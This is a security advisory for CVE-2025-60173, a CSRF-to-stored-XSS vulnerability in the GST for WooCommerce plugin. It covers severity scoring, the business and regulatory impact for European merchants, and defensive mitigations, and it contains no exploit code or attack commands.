CVE-2025-60173 is a high-severity Cross-Site Request Forgery (CSRF) vulnerability identified in the Ashwani kumar GST for WooCommerce plugin, which is used to manage Goods and Services Tax (GST) calculations within WooCommerce-based e-commerce sites. The vulnerability affects versions up to 2.0 of the plugin. The core issue is that the plugin does not adequately verify the authenticity of requests, allowing attackers to craft malicious requests that can be executed by authenticated users without their consent. This CSRF flaw can be leveraged to perform Stored Cross-Site Scripting (XSS) attacks, where malicious scripts are injected and persist within the application, potentially affecting multiple users. The CVSS 3.1 base score of 7.1 reflects a high severity, with the vector indicating that the attack can be performed remotely (AV:N), requires no privileges (PR:N), but does require user interaction (UI:R). The vulnerability impacts confidentiality, integrity, and availability (C:L/I:L/A:L) and has a scope change (S:C), meaning the attack can affect resources beyond the vulnerable component. The absence of patches at the time of publication increases the risk, although no known exploits in the wild have been reported yet. The vulnerability is particularly critical because WooCommerce is widely used for e-commerce, and the GST plugin is integral for tax compliance in regions where GST is applicable. Exploitation could lead to unauthorized actions such as altering tax settings, injecting malicious scripts that steal user data or session tokens, or disrupting the normal operation of the e-commerce platform.

For European organizations, especially those operating e-commerce platforms using WooCommerce with the Ashwani kumar GST plugin, this vulnerability poses significant risks. Although GST is primarily an Indian tax system, European merchants selling to or through Indian markets or using this plugin for tax calculations might be affected. The Stored XSS component could lead to session hijacking, theft of sensitive customer data, or fraudulent transactions, undermining customer trust and potentially violating GDPR regulations. The CSRF aspect allows attackers to perform unauthorized actions on behalf of authenticated users, which could result in financial discrepancies, manipulation of tax data, or disruption of sales processes. The scope change in the vulnerability means that the impact could extend beyond the plugin itself, potentially affecting other parts of the WooCommerce installation or integrated systems. Given the high reliance on e-commerce in Europe and the strict regulatory environment around data protection and financial transactions, exploitation could lead to legal liabilities, reputational damage, and financial losses.

European organizations should immediately assess whether they use the Ashwani kumar GST for WooCommerce plugin and identify the affected versions. Since no patches are currently available, organizations should consider the following specific mitigations: 1) Temporarily disable or remove the GST plugin until a secure update is released. 2) Implement Web Application Firewall (WAF) rules to detect and block CSRF attempts and suspicious POST requests targeting the plugin's endpoints. 3) Enforce strict Content Security Policy (CSP) headers to mitigate the impact of Stored XSS by restricting script execution sources. 4) Educate users and administrators about the risks of unsolicited links or actions that could trigger CSRF attacks. 5) Monitor logs for unusual activities related to tax settings or plugin usage. 6) Plan for immediate patch deployment once the vendor releases a fix. 7) Review and strengthen overall WooCommerce and WordPress security configurations, including ensuring that nonces and anti-CSRF tokens are properly implemented in custom or third-party plugins.